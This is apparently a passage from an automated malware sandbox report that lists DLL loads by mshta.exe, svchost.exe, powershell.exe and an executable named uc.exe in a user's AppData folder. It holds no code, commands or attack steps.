Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: eamsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
